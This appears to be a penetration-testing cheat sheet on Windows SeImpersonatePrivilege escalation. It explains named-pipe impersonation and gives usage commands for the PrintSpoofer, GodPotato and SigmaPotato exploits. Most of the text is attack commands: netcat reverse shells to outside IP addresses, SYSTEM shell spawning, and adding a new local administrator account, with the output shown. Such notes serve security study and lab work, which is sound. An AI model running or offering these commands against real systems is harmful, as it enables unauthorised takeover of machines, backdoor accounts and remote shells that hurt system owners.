SeImpersonatePrivilege

The SeImpersonatePrivilege allows a user to operate under another user's security context, typically by impersonating clients via mechanisms like named pipes or RPC. This privilege is normally assigned to Administrator accounts and built-in service accounts like LOCAL SERVICE, NETWORK SERVICE, and SERVICE. While rare for standard users, SeImpersonatePrivilege is often accessible when gaining code execution through services like IIS, which commonly run under accounts that have it.

Named pipes are a method of inter-process communication (IPC) in Windows. They let two separate processes—either on the same system or across a network—send and receive data as if they were reading/writing to a file. Think of a named pipe as a virtual file that one process (the server) creates and waits on, while another (the client) connects to it using a known name (like \\.\pipe\mypipe). Once connected, both processes can exchange data in real time.

In the context of privilege escalation, named pipes can be abused when a privileged process connects to a pipe controlled by a lower-privileged attacker. If the attacker has SeImpersonatePrivilege, they can impersonate the connecting user, effectively hijacking their permissions.

Exploit	Target Mechanism	Typical Use Case	OS Compatibility
PrintSpoofer	RPC/Named Pipes (Print API)	Fast, reliable on many Windows 10/Server versions	Windows 10/2016–2019 (some patched)
GodPotato	COM Server Hijack	When PrintSpoofer is patched	Works on newer/modern Windows (10/11)
SigmaPotato	Event Log Service	When PrintSpoofer and GodPotato fail	Windows 10+ (better support on newer builds)

PoCs

PrintSpofer

PrintSpoofer is a local privilege escalation exploit that abuses the SeImpersonatePrivilege to impersonate the SYSTEM account via a named pipe trick. It can be leveraged to sent a reverse shell or execute commands directly:

# Reverse shell
PrintSpoofer.exe -c "nc.exe 10.10.13.37 1337 -e cmd"

# Command execution
PrintSpoofer.exe -i -c cmd

It can also be used to spawn a SYSTEM shell on the desktop, for instance, when logged in via an RDP session:

# Check your session ID
C:\TOOLS>qwinsta
 SESSIONNAME       USERNAME                 ID  STATE   TYPE        DEVICE
>rdp-tcp           lab-user                  3  Active
 
# Spawn a new shell
C:\TOOLS>PrintSpoofer.exe -d 3 -c "powershell -ep bypass"

GodPotato

GodPotato is a local privilege escalation exploit that abuses COM and SeImpersonatePrivilege to impersonate SYSTEM by hijacking privileged tokens via named pipes.

# Reverse shell
GodPotato -cmd "nc -t -e C:\Windows\System32\cmd.exe 192.168.1.102 2012"

# Command execution
GodPotato -cmd "cmd /c whoami"

SigmaPotato

SigmaPotato is a local privilege escalation exploit that leverages the SeImpersonatePrivilege and the Event Log service to hijack a SYSTEM token through named pipe impersonation.

# Reverse shell
./SigmaPotato.exe --revshell <ip_addr> <port>

# Command execution
./SigmaPotato.exe <command>

It can be also used to create a new local administrator:

> .\sigmapotato.exe "net user dave4 Pass123! /add"
[+] Process Output:
The command completed successfully.


> .\sigmapotato.exe "net localgroup Administrators dave4 /add"
[+] Process Output:
The command completed successfully.

> Get-LocalGroupMember administrators
User        CLIENTWK220\dave4         Local